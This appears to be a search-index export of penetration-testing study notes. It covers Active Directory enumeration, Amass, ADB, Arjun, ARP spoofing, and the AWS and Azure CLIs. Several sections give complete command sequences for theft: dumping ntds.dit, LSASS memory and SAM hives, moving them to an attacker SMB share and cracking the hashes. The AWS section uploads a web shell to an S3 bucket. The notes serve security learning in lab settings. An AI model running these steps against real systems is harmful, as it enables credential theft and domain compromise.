    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#cheat-sheet-so-far","title":"Cheat sheet so far","text":"Command Description xfreerdp /v:$ip /u:htb-student /p:<password> RDP to lab target Get-ADGroup -Identity \"<GROUP NAME\"> -Properties * Get information about an AD group whoami /priv View a user's current rights Get-WindowsCapability -Name RSAT* -Online \\| Select-Object -Property Name, State Check if RSAT tools are installed Get-WindowsCapability -Name RSAT* -Online \\| Add-WindowsCapability \u2013Online Install all RSAT tools runas /netonly /user:htb.local\\jackie.may powershell Run a utility as another user Get-ADObject -LDAPFilter '(objectClass=group)' \\| select cn LDAP query to return all AD groups Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' \\| select name List disabled users (Get-ADUser -SearchBase \"OU=Employees,DC=INLANEFREIGHT,DC=LOCAL\" -Filter *).count Count all users in an OU get-ciminstance win32_product \\| fl Query for installed software Get-ADComputer -Filter \"DNSHostName -like 'SQL*'\" Get hostnames with the word \"SQL\" in their hostname Get-ADGroup -Filter \"adminCount -eq 1\" \\| select Name Get all administrative groups Get-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'} Find admin users that don't require Kerberos Pre-Auth Get-ADUser -Filter {adminCount -gt 0} -Properties admincount,useraccountcontrol Enumerate UAC values for admin users Get-WmiObject -Class win32_group -Filter \"Domain='INLANEFREIGHT'\" Get AD groups using WMI ([adsisearcher]\"(&(objectClass=Computer))\").FindAll() Use ADSI to search for all computers","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#acronyms","title":"Acronyms","text":"

    ADSI

    Active Directory Service Interfaces (ADSI) is a set of COM interfaces used to access the features of directory services from different network providers. ADSI is used in a distributed computing environment to present a single set of directory service interfaces for managing network resources. Administrators and developers can use ADSI services to enumerate and manage the resources in a directory service, no matter which network environment contains the resource. ADSI enables common administrative tasks, such as adding new users, managing printers, and locating resources in a distributed computing environment.

    CIM The Common Information Model (CIM) is the Distributed Management Task Force (DMTF) standard [DSP0004] for describing the structure and behavior of managed resources such as storage, network, or software components. One way to describe CIM is to say that it allows multiple parties to exchange management information about these managed elements. However, this falls short of fully capturing CIM's ability not only to describe these managed elements and the management information, but also to actively control and manage them. By using a common model of information, management software can be written once and work with many implementations of the common model without complex and costly conversion operations or loss of information.

    DIT Directory Information Tree.

    MMC You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system.

    OU

    What is an organizational unit in Active Directory? An OU is a container within a Microsoft Windows Active Directory (AD) domain that can hold users, groups and computers. It is the smallest unit to which an administrator can assign Group Policy settings or account permissions.

    RSAT

    The Remote Server Administration Tools (RSAT) have been part of Windows since the days of Windows 2000. RSAT allows systems administrators to remotely manage Windows Server roles and features from a workstation running Windows 10, Windows 8.1, Windows 7, or Windows Vista. RSAT can only be installed on Professional or Enterprise editions of Windows.

    SID

    In the context of the Microsoft Windows NT line of operating systems, a Security Identifier is a unique, immutable identifier of a user, user group, or other security principal.

    SPN

    A service principal name (SPN) is\u00a0a unique identifier of a service instance. Kerberos authentication uses SPNs to associate a service instance with a service sign-in account. Doing so allows a client application to request service authentication for an account even if the client doesn't have the account name.

    UAC

    User Account Control (UAC) is a fundamental component of Microsoft's overall security vision. UAC helps mitigate the impact of malware.

    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#attacking-active-directory","title":"Attacking Active Directory","text":"

    Once a Windows system is joined to a domain, it will no longer default to referencing the SAM database to validate logon requests. That domain-joined system will now send all authentication requests to be validated by the domain controller before allowing a user to log on.

    If needed, use tools like username Anarchy to create list of usernames.

    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#1-dumping-ntdsdit","title":"1. Dumping ntds.dit","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#dumping-ntdsdit-locally","title":"Dumping ntds.dit locally","text":"

    NT Directory Services (NTDS) is the directory service used with AD to find & organize network resources. Recall that NTDS.dit file is stored at %systemroot$/ntds on the domain controllers in a forest.

    The .dit stands for directory information tree. This is the primary database file associated with AD and stores all domain usernames, password hashes, and other critical schema information. If this file can be captured, we could potentially compromise every account on the domain

    # Connect to a DC with Evil-WinRM\nevil-winrm -i 10.129.201.57  -u bwilliamson -p 'P@55w0rd!'\n\n# To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights. Check Local Group Membership:\n*Evil-WinRM* PS C:\\> net localgroup\n\n# Check User Account Privileges including Domain. If the account has both Administrators and Domain Administrator rights, this means we can do just about anything we want, including making a copy of the NTDS.dit file.\nnet user <username>\n\n# Use vssadmin to create a Volume Shadow Copy (VSS) of the C: drive or whatever volume the admin chose when initially installing AD. Create a Shadow Copy of C:\n*Evil-WinRM* PS C:\\> vssadmin CREATE SHADOW /For=C:\n\n# Copy the NTDS.dit file from the volume shadow copy of C: onto another location on the drive to prepare to move NTDS.dit to our attack host.\n*Evil-WinRM* PS C:\\NTDS> cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit\n

    Launch smbserver in our attacker machine:

    sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n

    Now, from PS in the victim's windows machine:

    # Transfer the file to attacker machine\ncmd.exe /c move C:\\NTDS\\NTDS.dit \\\\$ip\\CompData\n

    And... crack the hash with hashcat:

    sudo hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#dumpins-ntdsdit-remotely","title":"Dumpins ntds.dit remotely","text":"
    crackmapexec smb $ip -u <username> -p <password> --ntds\n
    ","tags":["active directory","ldap","windows"]},{"location":"activedirectory-powershell-module/","title":"The ActiveDirectory PowerShell module","text":"

    The Active Directory module for Windows PowerShell is a PowerShell module that consolidates a group of cmdlets. You can use these cmdlets to manage your Active Directory domains, Active Directory Lightweight Directory Services (AD LDS) configuration sets, and Active Directory Database Mounting Tool instances in a single, self-contained package.

    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#installation","title":"Installation","text":"

    Download from The ActiveDirectory PowerShell module github repository

    This module is Microsoft signed and works even in PowerShell Constrained Language Mode (CLM).

    Import-Module .\\ADModule-master\\Microsoft.ActiveDirectory.Management.dll\u00a0\n\nImport-Module .\\ADModule-master\\ActiveDirectory\\ActiveDirectory.psd1\u00a0\n

    Also, you can copy the DLL from the github repo to your machine and use it to enumerate Active Directory without installing RSAT and without having administrative privileges.

    Import-Module C:\\ADModule\\Microsoft.ActiveDirectory.Management.dll -Verbose\n
    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#basic-commands","title":"Basic commands","text":"
    # Get ACL for a folder (or a file)\nGet-ACL \u201cC:\\Users\\Public\\Desktop\u201d\n\n# Search for AD elements. [See more in ldap queries](ldap.md)\nGet-ADObject -LDAPFilter <thespecificfilter>\n\n# Count occurrences in a query, like the one above.\n(Get-ADObject -LDAPFilter <thespecificfilter>\n).count\n
    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-aduser","title":"Get-ADUser","text":"

    More on https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-aduser?view=windowsserver2022-ps.

    # This command gets all users in the container OU=Finance,OU=UserAccounts,DC=FABRIKAM,DC=COM.\nGet-ADUser -Filter * -SearchBase \"OU=Finance,OU=UserAccounts,DC=FABRIKAM,DC=COM\"\n\n# This command gets all users that have a name that ends with SvcAccount:\nGet-ADUser -Filter 'Name -like \"*SvcAccount\"' | Format-Table Name,SamAccountName -A\n\n# This command gets all of the properties of the user with the SAM account name ChewDavid:\nGet-ADUser -Identity ChewDavid -Properties *\n\n# This command gets the user with the name ChewDavid in the Active Directory Lightweight Directory Services (AD LDS) instance:\nGet-ADUser -Filter \"Name -eq 'ChewDavid'\" -SearchBase \"DC=AppNC\" -Properties \"mail\" -Server lds.Fabrikam.com:50000\n\n# This command gets all enabled user accounts in Active Directory using an LDAP filter:\nGet-ADUser -LDAPFilter '(!userAccountControl:1.2.840.113556.1.4.803:=2)'\n\n# search for all administrative users with the `DoesNotRequirePreAuth` attribute set, meaning that they can be ASREPRoasted:\nGet-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'}\n\n# Find all administrative users with the SPN \"servicePrincipalName\" attribute set, meaning that they can likely be subject to a Kerberoasting attack\nGet-ADUser -Filter \"adminCount -eq '1'\" -Properties * | where servicePrincipalName -ne $null | select SamAccountName,MemberOf,ServicePrincipalName | fl\n
    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-adcomputer","title":"Get-ADComputer","text":"
    # Search domain computers for interesting hostnames. SQL servers are a particularly juicy target on internal assessments. The below command searches all hosts in the domain using `Get-ADComputer`, filtering on the `DNSHostName` property that contains the word `SQL`\nGet-ADComputer  -Filter \"DNSHostName -like 'SQL*'\"\n
    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-adgroup","title":"Get-ADGroup","text":"
    # Search for administrative groups by filtering on the `adminCount` attribute. If set to `1`, it's protected by AdminSDHolder and known as protected groups. `AdminSDHolder` is owned by the Domain Admins group. It has the privileges to change the permissions of objects in Active Directory. \nGet-ADGroup -Filter \"adminCount -eq 1\" | select Name\n
    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-adobject","title":"Get-ADObject","text":"","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"amass/","title":"Amass","text":"

    In depth DNS Enumeration and network mapping. Amass combines active and passive fingerprinting so being concious about this is really important. It's a assessment tool with reporting features.

    ","tags":["dns enumeration","enumeration","tools"]},{"location":"amass/#install","title":"Install","text":"
    apt install snapd\nservice snapd start\nsnap install amass\n

    Before diving into using Amass, we should make the most of it by adding API keys to it.

    1. First, we can see which data sources are available for Amass (paid and free) by running:

    amass enum -list \n

    2. Next, we will need to create a config file to add our API keys to.

    sudo curl https://raw.githubusercontent.com/OWASP/Amass/master/examples/config.ini >~/.config/amass/config.ini\n

    3. Now, see the file ~/.config/amass/config.ini and register in as many services as you can. Once you have obtained your API ID and Secret, edit the config.ini file and add the credentials to the file.

    sudo nano ~/.config/amass/config.ini\n

    4. Now, edit the file to add the sources. It is recommended to add:

    • censys.io: guesswork out of understanding and protecting your organization\u2019s digital footprint.
    • https://asnlookup.com: Quickly lookup updated information about specific Autonomous System Number (ASN), Organization, CIDR, or registered IP addresses (IPv4 and IPv6) among other relevant data. We also offer a free and paid API access!
    • https://otx.alienvault.com: Quickly identify if your endpoints have been compromised in major cyber attacks using OTX Endpoint Security and many other.
    • https://bigdatacloud.com
    • https://cloudflare.com
    • https://www.digicert.com/tls-ssl/certcentral-tls-ssl-manager:
    • https://fullhunt.io
    • https://github.com
    • https://ipdata.co
    • https://leakix.net
    • as many more as you can.

    5. When ready, we can run amass:

    ","tags":["dns enumeration","enumeration","tools"]},{"location":"amass/#basic-usage","title":"Basic usage","text":"
    amass enum -active -d crapi.apisec.ai  -ip -brute -dir path/to/save/results/\n# enum: Perform ACTIVE  enumerations and network mapping\n# -ip: Show ip addresses of cached subdomais.\n# -brute: Perform a brute force dns attack.\n\namass enum -passive -d crapi.apisec.ai -src  -dir path/to/save/results/\n# enum: Perform PASSIVE enumerations and network mapping.\n# src: display sources of the host domain.\n# -dir: Specify a folder to save results.\n\namass intel -d crapi.apisec.ai\n# intel: Discover targets for enumerations. Passive fingerprinting.\n

    Some flags:

    -active: Attempt zone transfer and certificate name grabs.\n-pasive: Passive fingerprinting.\n-bl: Blacklist of subdomain names that will not be investigated\n-d: to specify a domain\n-ip: Show ip addresses of cached subdomais.\n\u2013include-unresolvable: output DNS names that did not resolve.\n-o file.txt: To output the result into a file\n-w: path to a different wordlist file\n

    Also, to be more precise:

    amass enum -active -d <target> | grep api\n# amass enum -active -d microsoft.com | grep api\n

    Amass has several useful command-line options. Use the intel command to collect SSL certificates, search reverse Whois records, and find ASN IDs associated with your target. Start by providing the command with target IP addresses

    amass intel -addr [target IP addresses]\n

    If this scan is successful, it will provide you with domain names. These domains can then be passed to intel with the whois option to perform a reverse Whois lookup:

    amass intel -d [target domain] \u2013whois\n

    This could give you a ton of results. Focus on the interesting results that relate to your target organization. Once you have a list of interesting domains, upgrade to the enum subcommand to begin enumerating subdomains. If you specify the -passive option, Amass will refrain from directly interacting with your target:

    amass enum -passive -d [target domain]\n

    The active enum scan will perform much of the same scan as the passive one, but it will add domain name resolution, attempt DNS zone transfers, and grab SSL certificate information:

    amass enum -active -d [target domain]\n

    To up your game, add the -brute option to brute-force subdomains, -w to specify the API_superlist wordlist, and then the -dir option to send the output to the directory of your choice:

    amass enum -active -brute -w /usr/share/wordlists/API_superlist -d [target domain] -dir [directory name]  \n
    ","tags":["dns enumeration","enumeration","tools"]},{"location":"android-debug-bridge/","title":"Android Debug Bridge - ADB","text":"

    ADB or Android Debug Bridge is a command-line tool developed to facilitate communication between a computer and a connected emulator or Android device. ADB works with the aid of three components called Client, Daemon, and Server.

    • Client: It\u2019s is very computer on which you use a command-line terminal to issue an ADB command. which sends commands.
    • Daemon: Or, ADBD is a background process that runs on both connected devices. It\u2019s responsible for running commands on a connected emulator or Android device.
    • Server: It runs in the background and works as a bridge between the Client and the Daemon and manages the communication. which manages communication between the client and the daemon.
    ","tags":["mobile pentesting"]},{"location":"android-debug-bridge/#basic-commands","title":"Basic commands","text":"
    # Activate remote shell command console on the connected Android smartphone or tablet.\nadb shell\n\n# List Android devices connected to your computer\nadb devices\n# -l: to list devices by model or product number\n\n# Connect to device\nadb connect\n\n# List Android devices connected and emulators in your computer\nshow devices\n\n# Remove a package\npm uninstall --user 0 com.package.name\n\n# Remove a package but leave app data \npm uninstall -k --user 0 com.package.name\n# -k: Keep the app data and cache after package removal\n\n# Reinstall an uninstalled system app\ncmd package install-existing com.package.name\n
    ","tags":["mobile pentesting"]},{"location":"android-debug-bridge/#howtos","title":"Howtos","text":"
    • Remove bloatware from android device.
    ","tags":["mobile pentesting"]},{"location":"apktool/","title":"apktool","text":"","tags":["mobile pentesting","tools"]},{"location":"apktool/#installation","title":"Installation","text":"

    Go to your tool folder and download the tool:

    wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.6.0.jar\n

    Have the device from genymotion already running on Host-Only mode + NAT.

    Have your kali on Host-Only mode + NAT.

    Run:

    adb connect <the device Host-Only IP>:5555\n\n#Making sure that genymotion is not using a proxy:\nadb shell-settings put global http_proxy :0\n\n# Installing the app\nadb install nameOfApp\n

    To decompile and see source code:

    java-jar apktool_2.6.0.jar d -s nameOfApp\n# d: decompile\n# -s: source.\n

    When decompiled, a folder is created. If you go into the folder you will see the file classes.dex, which contains the source code. To see it:

    jadx-gui\n
    ","tags":["mobile pentesting","tools"]},{"location":"apt-packet-manager/","title":"Package Manager (APT)","text":"
    # Search for a package or text string:\napt search <text_string>\n\n# Show package information:\napt show <package>\n\n# Show package dependencies:\napt depends <package>\n\n# Show the names of all the packages installed in the system:\napt list --installed\n\n# Install a package:\napt install <package>\n\n# Uninstall a package:\napt remove <package>\n\n# Delete a package including its configuration files:\napt purge <package>\n\n# Delete automatically those packages that are not being used (be careful with this command, due to apt's hell dependency it may delete unwanted packages):\napt autoremove\n\n# Update the repositories information:\napt update\n\n# Update a package to the last available version in the repository:\napt upgrade <package>\n\n# Update the full distribution. It will update our system to the next available version:\napt upgrade -y\n\n# Clean caches, downloaded packages, etc:\napt clean && apt autoclean\n
    ","tags":["bash"]},{"location":"aquatone/","title":"Aquatone - Automatize web scanner in large subdomain lists","text":"

    Aquatone is a tool for automatic and visual inspection of websites across many hosts and is convenient for quickly gaining an overview of HTTP-based attack surfaces by scanning a list of configurable ports, visiting the website with a headless Chrome browser, and taking a screenshot. This is helpful, especially when dealing with huge subdomain lists.

    sudo apt install golang chromium-driver\n\ngo get github.com/michenriksen/aquatone\n\nexport PATH=\"$PATH\":\"$HOME/go/bin\"\n
    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"aquatone/#basic-usage","title":"Basic usage","text":"
    cat example_of_list.txt | aquatone -out ./aquatone -screenshot-timeout 1000\n
    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"arjun/","title":"Arjun","text":"","tags":["api","tools"]},{"location":"arjun/#installation","title":"Installation","text":"
    sudo git clone\u00a0https://github.com/s0md3v/Arjun.git\n

    Other ways:

    pip3 install arjun\n
    ","tags":["api","tools"]},{"location":"arjun/#basic-commands","title":"Basic commands","text":"
    # Run arjun againts a single URL\narjun -u https://api.example.com/endpoint\n\n# arjun will provide you with likely parameters from a wordlist. Its results are based on the deviation of response lengths/codes\narjun --headers \"Content-Type: application/json\" -u http://api.example.com/register -m JSON --include='{$arjun}' --stable\n# -m Get method parameters GET/POST/JDON/XML\n# -i Import targets (a txt list)\n# --include Specify injection point, for example:\n        #  --include='<?xml><root>$arjun$</root>\n        #  --include='{\"root\":{\"a\":\"b\",$arjun$}}'\n

    Awesome wiki about arjun usage: https://github.com/s0md3v/Arjun/wiki/Usage.

    ","tags":["api","tools"]},{"location":"arp-poisoning/","title":"Arp poisoning","text":"

    This attack is performed by sending gratuitous ARP replies.

    ","tags":["windows","linux","arp","arp poisoning"]},{"location":"arp-poisoning/#intercepting-smb-traffic","title":"Intercepting SMB traffic","text":"

    We'll be using arpspoof tool, included in dniff.

    ","tags":["windows","linux","arp","arp poisoning"]},{"location":"arpspoof-dniff/","title":"arpspoof from dniff","text":"

    dniff is a collection of tools for network auditing and penetration testing. It includes arpspoof, a utility designed to intercept traffic on a switched LAN.

    Before running, enable Linux Kernel IP Forwarding (this transforms Linux box into a router).

    echo 1 > /proc/sys/net/ipv4/ip_forward\n

    And then, run arpspoof:

    arpspoof -i <interface> -t $ip -r <host IP>\n# interface: NIC you want to use (like eth0 for your local LAN, or tap0 for Hera Lab)\n# target IP: one of the victim address\n# host IP: the other victim address.\n

    After that, run Wireshark to intercept the traffic.

    • SMB traffic. When capturing smb traffic in wireshark, go to: FILE>Export Objects>SMB/SMB2. There you have all files uploaded or downloaded from a server during a SMB capture session.
    • Telnet traffic: Telnet sends characters one by one, that's why you don't see the username/password straight away. But with \"Follow TCP Stream\", wireshark will put all data together and you will be able to see the username/password. Just rightclick on a packet of the telnet session and choose: \"Follow TCP Stream\".
    ","tags":["windows","tools"]},{"location":"attacking-lsass/","title":"Attacking LSASS","text":"

    See Windows credentials storage.

    "},{"location":"attacking-lsass/#dumping-lsass-process-memory","title":"Dumping LSASS Process Memory","text":"

    There are several methods to dump LSASS process memory.

    "},{"location":"attacking-lsass/#1-task-manager-method","title":"1. Task manager method","text":"

    Open it. In Process tab, search for Local Security Authority Process. Click right on it and select Create dump file. A file called lsass.DMP is created and saved in:

    C:\\Users\\loggedonusersdirectory\\AppData\\Local\\Temp\n

    Transfer file to attacking machine.

    "},{"location":"attacking-lsass/#rundll32exe-comsvcsdll-method","title":"Rundll32.exe & Comsvcs.dll method","text":"

    Modern anti-virus tools recognize this method as malicious activity.

    # Finding LSASS PID in cmd\ntasklist /svc\n\n# Finding LSASS PID in PowerShell\nGet-Process lsass\n\n# Creating lsass.dmp using PowerShell\nrundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump <PID> C:\\lsass.dmp full\n# With this command, we are running rundll32.exe to call an exported function of comsvcs.dll which also calls the MiniDumpWriteDump (MiniDump) function to dump the LSASS process memory to a specified directory (C:\\lsass.dmp). \n

    Transfer file to attacking machine.

    "},{"location":"attacking-lsass/#3-pypykatz","title":"3. Pypykatz","text":"

    pypykatz parses the secrets hidden in the LSASS process memory dump.

    pypykatz lsa minidump /home/path/lsass.dmp \n
    "},{"location":"attacking-lsass/#crack-the-file","title":"Crack the file","text":""},{"location":"attacking-lsass/#cracking-the-nt-hash-with-hashcat","title":"Cracking the NT Hash with Hashcat","text":"
    sudo hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt\n
    "},{"location":"attacking-sam/","title":"Attacking SAM","text":"

    See Windows credentials storage.

    "},{"location":"attacking-sam/#dumping-sam-locally","title":"Dumping SAM Locally","text":""},{"location":"attacking-sam/#1-copying-sam-registry-hives","title":"1. Copying SAM Registry Hives","text":"

    There are three registry hives that we can copy if we have local admin access on the target; each will have a specific purpose when we get to dumping and cracking the hashes.

    Registry Hive Description hklm\\sam Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext. hklm\\system Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database. hklm\\security Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.

    Launching CMD as an admin will allow us to run reg.exe to save copies of the registry hives.

    reg.exe save hklm\\sam C:\\sam.sav\n\nreg.exe save hklm\\system C:\\system.save\n\nreg.exe save hklm\\security C:\\security.save\n

    Transfer the registry hives to our attacker machine, for instance, with smbserver.py from impacket.

    # From the attacker machine (our kali) all we must do to create the share is run smbserver.py -smb2support using python, give the share a name (CompData) and specify the direct\n#########################################\nsudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/\n\n# From the victim's machine (windows)\n#########################################\nmove sam.save \\\\$ipAttacker\\CompData\nmove system.save \\\\$ipAttacker\\CompData\nmove security.save \\\\$ipAttacker\\CompData\n
    "},{"location":"attacking-sam/#2-dumping-hashes-with-impackets-secretsdumppy","title":"2. Dumping Hashes with Impacket's secretsdump.py","text":"
    locate secretsdump \n
    python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL\n

    Secretsdump dumps the local SAM hashes and would've also dumped the cached domain logon information if the target was domain-joined and had cached credentials present in hklm\\security.

    The first step secretsdump executes is targeting the system bootkey before proceeding to dump the LOCAL SAM hashes. It cannot dump those hashes without the boot key because that boot key is used to encrypt & decrypt the SAM database.

    Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n(uid:rid:lmhash:nthash)\n

    Most modern Windows operating systems store the password as an NT hash. Operating systems older than Windows Vista & Windows Server 2008 store passwords as an LM hash, so we may only benefit from cracking those if our target is an older Windows OS. Knowing this, we can copy the NT hashes associated with each user account into a text file and start cracking passwords.

    "},{"location":"attacking-sam/#3-cracking-hashes-with-hashcat","title":"3. Cracking Hashes with Hashcat","text":"

    See hashcat:

    # Adding nthashes to a .txt File\n# Copy paste them in hashestocrack.txt\n\n# Hashcat them\nsudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt\n# -m 1000: select module for NT hashes\n
    "},{"location":"attacking-sam/#dumping-sam-remotely","title":"Dumping SAM Remotely","text":""},{"location":"attacking-sam/#with-crackmapexec","title":"With CrackMapExec","text":"

    With access to credentials with local admin privileges, it is also possible for us to target LSA Secrets over the network.

    Cheat sheet of CrackMapExec.

    crackmapexec smb $ip --local-auth -u <username> -p <password> --sam\n\ncrackmapexec smb $ip --local-auth -u <username> -p <password> --lsa\n
    "},{"location":"aws-cli/","title":"AWS cli","text":"

    Tool to list S3 objects. S3 is an object storage service in the AWS cloud service. With S3, you can store objects in buckets. Files stored in an Amazon S3 bucket are called S3 objects.

    ","tags":["cloud","amazon","s3","aws"]},{"location":"aws-cli/#installation","title":"Installation","text":"
    curl \"https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip\" -o \"awscliv2.zip\"\nunzip awscliv2.zip\nsudo ./aws/install\n

    Update version:

    sudo ./aws/install --bin-dir /usr/local/bin --install-dir /usr/local/aws-cli --update\n

    To access you will need access key. You generate access keys in AWS Dashboard.

    aws configure  \nAWS Access Key ID [None]: a  \nAWS Secret Access Key [None]: a  \nDefault region name [None]: <region>  \nDefault output format [None]: text\n\n#######################\n###### Where\n#######################\n# - _AWS Access Key ID_ & _AWS Secret Access Key can be any random strings at least one character long,_\n# - _Default region name_ can be any region from [AWS\u2019s region list](https://aws.amazon.com/about-aws/global-infrastructure/regions_az/),\n# - _Default output format_ can be `json`, `yaml`, `yaml-stream`, `table` or `text`. As we are not expecting enormous amount of data, `text` should do just fine.\n
    ","tags":["cloud","amazon","s3","aws"]},{"location":"aws-cli/#basic-commands","title":"Basic commands","text":"
    # Check version\naws --version\n\n# List IAM users (if you have permissions)\naws iam list-users --region <region>\n# --region is optional\n

    Uploaded the file shell.php to the S3 bucket thetoppers.htb.

    aws --endpoint=http://s3.thetoppers.htb s3 cp simpleshell.php s3://thetoppers.htb\n
    aws [service-name] [command] [args] [--flag1] [--flag2]\n
    ","tags":["cloud","amazon","s3","aws"]},{"location":"azure-cli/","title":"Azure-CLI","text":"

    The Azure CLI is a command-line interface. A cross-platform command-line program (Windows, Linux and macOs) to connect to Azure and execute administrative commands.

    All commands: https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest.

    It\u2019s an executable program that you can use to execute commands in Bash. You can use the Azure CLI to perform every possible management task in Azure. Like Azure PowerShell, the CLI allows you to run one-off commands or you can combine them into a script and execute them together.

    Azure CLI is a command-line program to connect to Azure and execute administrative commands on Azure resources. It runs on Linux, macOS, and Windows, and allows administrators and developers to execute their commands through a terminal, command-line prompt, or script instead of a web browser.

    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#installation","title":"Installation","text":"
    • Linux: apt-get on Ubuntu, yum on Red Hat, and zypper on OpenSUSE
    • Mac: Homebrew.

    • Modify your sources list so that the Microsoft repository is registered and the package manager can locate the Azure CLI package:

    AZ_REPO=$(lsb_release -cs)\necho \"deb [arch=amd64] https://packages.microsoft.com/repos/azure-cli/ $AZ_REPO main\" | \\\nsudo tee /etc/apt/sources.list.d/azure-cli.list\n
    1. Import the encryption key for the Microsoft Ubuntu repository. This allows the package manager to verify that the Azure CLI package you install comes from Microsoft.
    curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -\n
    1. Install the Azure CLI:
    sudo apt-get install apt-transport-https\nsudo apt-get update\nsudo apt-get install azure-cli\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#basic-usage","title":"Basic usage","text":"

    Run Azure-CLI

    # Running Azure-CLI from Cloud Shell\nbash\n\n# Running Azure-CLI from Linux\naz\n

    Basic commands to warm up:

    # See installed version\naz --version\n\n# you can use the letters az to start an Azure command \naz upgrade\n\n# Launch Azure CLI interactive mode\naz interactive\n\n# Getting help. If you want to find commands that might help you manage a storage blob, you can use the find command:\naz find blob\n\n# If you already know the name of the command you want, the\u00a0`--help`\u00a0argument\naz storage blob --help\n

    Commands in the CLI are structured in\u00a0groups\u00a0and\u00a0subgroups. Each group represents a service provided by Azure, and the subgroups divide commands for these services into logical groupings. For example, the\u00a0storage\u00a0group contains subgroups including\u00a0account,\u00a0blob, and\u00a0queue.

    Because you're working with a local install of the Azure CLI, you'll need to authenticate before you can execute Azure commands by using the Azure CLI\u00a0login\u00a0command.

    az login\n

    The Azure CLI will typically launch your default browser to open the Azure sign-in page. After successfully signing in, you'll be connected to your Azure subscription.

    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#output-formatting","title":"Output formatting","text":"
    # Results in a json format by default\naz group list\n\n# Results in a line format\naz group list --out tsv\n\n# Results in a table\naz group list --out table\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#resource-groups","title":"Resource groups","text":"
    # List resource groups\naz group list\n# remember you can format output\n\n# List all your resource groups in a table:\naz group list --output table\n\n# Return in json all my resources in my resource group:\naz group list --query \"[?name == '$RESOURCE_GROUP']\"\n\n\n# Retrieve properties from an existing and known resource group\naz group show --name myresourcegroup\n\n# From a specific resource group (provided, for instance, its name), query a value. Querying location:\naz group show --name <name> --query location --out table\n\n# Querying id\naz group show --name <name> --query id --out table\n\n# Create a Resource group\naz group create --name <name> --location <location>\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#disk","title":"Disk","text":"
    # List disks\naz disk list\n\n# Retrieve the properties of an existing Disk\naz disk show --name myDiskname --resource-group rg-test2\n\n# Retrieve the properties of an existing Disk, and output it in a table\naz disk show --name myDiskname --resource-group rg-test2 --out table\n\n\n# Create a new disk\naz disk create --resource-group $myResourceGroup --name $mynewDisk --sku \"Standard_LRD\" --size-gb 32\n\n# Increase the size of a disk\naz disk update --resource-group $myResourceGroup --name $myDiskName --size-gb 64\n\n# Change standard SKU to premium\naz disk update --resource-group $myResourceGroup --name $myDiskName --sku \"Premium_LRS\"\n\n# Verify size of a disk by querying size\naz disk show --resource-group $myResourceGroup --name $myDiskName --query diskSizeGb --out table\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#vms","title":"VMs","text":"
